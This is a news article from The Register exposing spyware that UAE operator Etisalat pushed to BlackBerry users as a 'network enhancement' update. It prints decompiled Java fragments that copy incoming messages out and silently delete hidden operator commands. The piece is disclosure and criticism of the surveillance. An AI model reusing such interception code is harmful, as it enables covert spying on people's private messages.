Feeds

BlackBerry snoopers can explain everything

Etisalat downloads smoke and mirrors

Internet Security Threat Report 2014

Etisalat, the United Arab Emirates operator who recently pushed snooping software to its BlackBerry-using customers, has explained that it's all in the interests of network compatibility.

But its claim that appear fall down at the slightest scrutiny - or at least with a glance at the code in question.

The patch, which was sent out earlier this week, includes a file called Registration.jar, which appears to emanate from snooping-software specialist SS8. Registration.jar includes Java code clearly intended to intercept and make copies of received e-mail and text messages, despite assurances from Etisalat that the package is "required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas".

Users first noticed suspicious activity when their BlackBerrys started experiencing heavy battery drain, which Etisalat attributes to "a slight technical fault while upgrading the software of these devices". Security researchers claim it's actually down to the snooping software repeatedly trying to register with a central server. The statement from Etisalat also claims that users experiencing problems - the operator admits to receiving 300 complaints - can dial 101 to have the upgrade reversed.

That may well be true: the software Etisalat is distributing isn't supposed to be reporting on every user. It is designed to be remotely triggered on specific handsets, before commencing its task of copying off that customer's messages to servers within the network operator.

The Register has been taking a look at Registration.jar, suitably decompiled, and Java developers might be interested in this snippet:

public void messagesAdded(FolderEvent fevent)
  {
  sentmsg++;
  if(fevent.getType() == 1)
  {
    Message msg = fevent.getMessage();
    try
    {
    String subject = msg.getSubject();
    if(subject != null && (subject.indexOf("I: response") != -1 || subject.indexOf("I:FW:") != -1))
     return;
    }
    catch(Exception e) { }
    MsgOut msgout = new MsgOut(log, this, msg, true);
    msgout.start();
    } else
      if(fevent.getType() != 2);
    }

...which is clearly related to roaming between 2G and 3G networks. Or this section, which (at a glance) would appear to be code devoted to removing received instructions (originating from "Customer Services") before the user gets a chance to see them:

if (fpin != null && fnam != null
&& fpin.equalsIgnoreCase("Customer Service")
  && fnam.equalsIgnoreCase("Customer Service")
  && cmds.msgIsPIN(msg)) {
  String body = msg.getBodyText();
  try {
    msg.getFolder().deleteMessage(msg, true);
  } catch (Exception exception) {
    /* empty */
  }

...but that can't be true, so it's obviously about enhancing network coverage.

Remotely installing spyware on users' handsets is one thing, but we would expect the snoops to at least obfuscate their code, not to mention that Registration.jar includes a complete SMTP client: ideal for avoiding any interaction with the RIM servers over in Canada.

Etisalat reckons they have 145,000 BlackBerry users, which means that 105,000 of them (who didn't complain) may have got this snooping software installed and running, ready to receive that coded command to start intercepting messages when someone decides they're worth watching. ®

Remote control for virtualized desktops

More from The Register

next story
YOU are the threat: True confessions of real-life sysadmins
Who will save the systems from the men and women who save the systems from you?
Download alert: Nearly ALL top 100 Android, iOS paid apps hacked
Attack of the Clones? Yeah, but much, much scarier – report
Broadband sellers in the UK are UP TO no good, says Which?
Speedy network claims only apply to 10% of customers
Virgin Media struck dumb by NATIONWIDE packet loss balls-up
Turning it off and on again fixes glitch 12 HOURS LATER
Ofcom snatches 700MHz off digital telly, hands it to mobile data providers
Hungry mobe'n'slab-waving Blighty swallows spectrum
Fujitsu CTO: We'll be 3D-printing tech execs in 15 years
Fleshy techie disses network neutrality, helmet-less motorcyclists
prev story

Whitepapers

Why and how to choose the right cloud vendor
The benefits of cloud-based storage in your processes. Eliminate onsite, disk-based backup and archiving in favor of cloud-based data protection.
Getting started with customer-focused identity management
Learn why identity is a fundamental requirement to digital growth, and how without it there is no way to identify and engage customers in a meaningful way.
High Performance for All
While HPC is not new, it has traditionally been seen as a specialist area – is it now geared up to meet more mainstream requirements?
Reducing the cost and complexity of web vulnerability management
How using vulnerability assessments to identify exploitable weaknesses and take corrective action can reduce the risk of hackers finding your site and attacking it.
Saudi Petroleum chooses Tegile storage solution
A storage solution that addresses company growth and performance for business-critical applications of caseware archive and search along with other key operational systems.